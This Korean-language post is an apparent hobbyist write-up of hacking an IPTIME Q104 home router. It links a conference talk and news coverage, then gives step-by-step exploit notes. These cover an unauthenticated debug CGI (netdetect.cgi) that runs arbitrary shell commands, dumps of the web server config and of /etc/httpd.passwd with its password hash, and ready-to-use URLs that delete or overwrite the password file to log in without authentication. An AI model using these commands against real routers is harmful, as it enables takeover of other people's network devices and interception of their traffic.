IPTIME 해킹 관련 내용 1

정우형 시큐인사이드 발표 영상

http://www.youtube.com/watch?v=_6XrBSrnkTQ&feature=youtu.be

데일리 시큐 기사 

http://www.dailysecu.com/news_view.php?article_id=2585 

http://returnaddr.org/b0d/view.php?id=mydoc_secudoc&page=1&sn1&divpage=1&sn=off&ss=on&sc=on&select_arrange=hit&desc=asc&no=6&PHPSESSID=3f5a7202e2ea46023bd01491e08ff60d 

* IPTIME 공유기 해킹 과정 정리 * ㅇ 장비명 : IpTIME Q104 ㅇ 벤   더 : EFM Networks ㅇ 접근포트 : http://192.168.0.1 (http://192.168.0.1:55555, http://192.168.255.1:55555) - BASIC Auth 사용하여 인증 - 디폴트 password (admin/null)와 쉬운 PW를 찍었으나 실패. - 울프팀 게임으로 인해 과다 트래픽 감지 / 차단되어 경고 창 뜸 - 소스보기 => 리포트 화면이 iframe 으로 구성된 것을 확인 - 소스 : <iframe width="600" height="430" name="subwin" src="http://192.168.0.1/nd-bin/netdetect.cgi?flag=nd-report"> - http://192.168.0.1/cgi-bin/timepro.cgi?flag=debug   는 AUTH를 거치지만,   http://192.168.0.1/nd-bin/netdetect.cgi?flag=debug 는 거치지 않고 아래창 뜸       File Name :  [                         ]    Command Name :  [                         ]         [Show]   action이 /cgi-bin/timepro.cgi 지만, netdetect.cgi로 해주고   input 태그 값인 cmd에 원하는 명령 입력하여 실행! ----------------------- /var/boa_vh.conf ----------------------- Port 55555  User root  Group root  ServerAdmin root@localhost  VirtualHost  DocumentRoot /home/httpd  UserDir public_html  DirectoryIndex index.html  KeepAliveMax 100  KeepAliveTimeout 10  MimeTypes /etc/mime.types  DefaultType text/plain  AddType application/x-httpd-cgi cgi  AddType text/html html  ScriptAlias /cgi-bin/ /bin/  ScriptAlias /nd-bin/ /bin/  ScriptAlias /login/ /bin/login/  ScriptAlias /ddns/ /bin/ddns/  ScriptAlias /testbin/ /tmp/  ServerName IPRouter  SinglePostLimit 2097152  Auth /cgi-bin /etc/httpd.passwd  Auth /main /etc/httpd.passwd  ----------------------- /var/firewall_rule ----------------------- separator:----- Messenger -----:0:  aim:AIM:1:32:nat:app_filter:tcp:0:5190:filter_dnat:0  buddy:버디버디:3:32:nat:app_filter:tcp:0:952:filter_dnat:0:+:32:nat:app_filter:tcp:0:810-819:filter_dnat:0:+:32:nat:app_filter:tcp:0:940-959:filter_dnat:0  icq:ICQ:1:32:nat:app_filter:tcp:0:5190:filter_dnat:0  iman:IMAN(KT):1:32:nat:app_filter:tcp:0:5282:filter_dnat:0  irc:IRC:2:32:nat:app_filter:tcp:0:6660-6669:filter_dnat:0:+:32:nat:app_filter:udp:0:6660-6669:filter_dnat:0  msm:MSN 메신저:3:32:nat:app_filter:tcp:0:1863:filter_dnat:0:+:32:nat:app_filter:tcp:0:6891-6900:filter_dnat:0:+:16:url:messenger.hotmail.com:  nateon:네이트온:2:32:nat:app_filter:tcp:0:5004:filter_dnat:0:+:16:url:prs.nate.com:  tachy:타키(SayClub):1:32:nat:app_filter:tcp:0:6699:filter_dnat:0  separator:-------- P2P --------:0:  edonkey:eDonkey,Pruna,eMule:1:32:nat:app_filter:tcp:0:4661-4662:filter_dnat:0  fileguri:파일구리:1:32:nat:app_filter:tcp:0:9493:filter_dnat:0  guruguru:구루구루:2:32:nat:app_filter:tcp:0:9292:filter_dnat:0:+:32:nat:app_filter:tcp:0:22000-22400:filter_dnat:0  soribard:소리바다:2:32:nat:app_filter:udp:0:7674-7675:filter_dnat:0:+:32:nat:app_filter:udp:0:22321:filter_dnat:0  winmx:WinMX:2:32:nat:app_filter:tcp:0:6699:filter_dnat:0:+:32:nat:app_filter:udp:0:6257:filter_dnat:0  separator:-------- Game -------:0:  diable:디아블로:1:32:nat:app_filter:tcp:0:4000:filter_dnat:0  kartrider:카트라이더:2:32:nat:app_filter:tcp:0:39311:filter_dnat:0:+:32:nat:app_filter:tcp:0:36567:filter_dnat:0  lineage:리니지:2:32:nat:app_filter:tcp:0:1950-2002:filter_dnat:0:+:32:nat:app_filter:tcp:0:2004-2200:filter_dnat:0  mu:뮤:1:32:nat:app_filter:tcp:0:44405:filter_dnat:0  ----------------------- /etc/httpd.passwd ----------------------- admin:$1S89Y1UUF3Ls: - echo 명령을 이용하여 httpd.passwd 내용을 "admin::" 로 비번 초기화 시킨 후,    password 인증 없이 접속!! - http://192.168.255.1:55555/cgi-bin/timepro.cgi?flag=debug&cmd=rm -f /etc/httpd.passwd http://192.168.255.1:55555/cgi-bin/timepro.cgi?flag=debug&cmd=cp /etc/httpd.passwd.bak /etc/httpd.passwd - 잡업 후 복구 해야~ by xcuter